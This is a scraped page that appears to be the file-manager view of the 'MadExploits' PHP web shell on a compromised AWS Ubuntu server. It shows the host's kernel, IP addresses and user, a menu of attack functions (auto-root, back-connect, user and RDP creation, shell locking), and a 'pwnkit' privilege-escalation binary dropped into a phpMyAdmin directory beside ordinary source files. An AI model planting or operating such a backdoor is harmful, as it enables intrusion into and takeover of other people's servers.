Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.144.178.2
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
WebAuthn /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
CBORDecoder.php
6.96
KB
-rw-r--r--
CustomServer.php
18.76
KB
-rw-r--r--
DataStream.php
1.27
KB
-rw-r--r--
Server.php
2.29
KB
-rw-r--r--
WebAuthnException.php
127
B
-rw-r--r--
WebauthnLibServer.php
11.09
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DataStream.php
<?php declare(strict_types=1); namespace PhpMyAdmin\WebAuthn; use function fopen; use function fread; use function ftell; use function fwrite; use function rewind; final class DataStream { /** @var resource */ private $stream; /** @throws WebAuthnException */ public function __construct(string $binaryString) { $resource = fopen('php://memory', 'rb+'); if ($resource === false || fwrite($resource, $binaryString) === false) { throw new WebAuthnException(); } if (! rewind($resource)) { throw new WebAuthnException(); } $this->stream = $resource; } /** @throws WebAuthnException */ public function take(int $length): string { if ($length < 0) { throw new WebAuthnException(); } if ($length === 0) { return ''; } $string = fread($this->stream, $length); if ($string === false) { throw new WebAuthnException(); } return $string; } /** @throws WebAuthnException */ public function getPosition(): int { $position = ftell($this->stream); if ($position === false) { throw new WebAuthnException(); } return $position; } }
Close